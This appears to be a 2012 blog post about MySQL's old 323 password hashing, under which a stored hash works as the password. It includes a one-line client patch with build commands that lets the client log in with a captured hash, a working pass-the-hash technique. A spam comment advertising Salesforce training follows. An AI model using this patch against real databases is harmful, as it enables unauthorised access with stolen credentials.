Wednesday, January 11, 2012

MySQL 323 Hash Pass-the-hash

This is just a note. This is a known old problem. If a password hash of MySQL user is hashed with OLD_PASSWORD() function or is imported from very old version, the hash is equivalent to password. You do not need to crack a hash to login to MySQL.

Here is my patch for libmysql_r/password.c for MySQL version 5.1.55.

--- password.c.orig     2012-01-11 21:32:02.644042061 +0700
+++ password.c  2012-01-11 21:33:30.676109909 +0700
@@ -191,6 +191,7 @@ void scramble_323(char *to, const char *
     char extra, *to_start=to;
     const char *message_end= message + SCRAMBLE_LENGTH_323;
     hash_password(hash_pass,password, (uint) strlen(password));
+    if (strlen(password) == 16) sscanf(password, "%8lx%8lx", &hash_pass[0], &hash_pass[1]);
     hash_password(hash_message, message, SCRAMBLE_LENGTH_323);
     randominit(&rand_st,hash_pass[0] ^ hash_message[0],
                hash_pass[1] ^ hash_message[1]);

Here the commands to build only client.

$ ./configure --without-server
$ make


  1. Hi.

    Thanks for sharing this information with us. This information was so useful to us about SQL programming thanks for sharing this information with us.

    Here is sharing some Salesforce Service Cloud information that may be helpful to you.

    Salesforce Service Cloud Training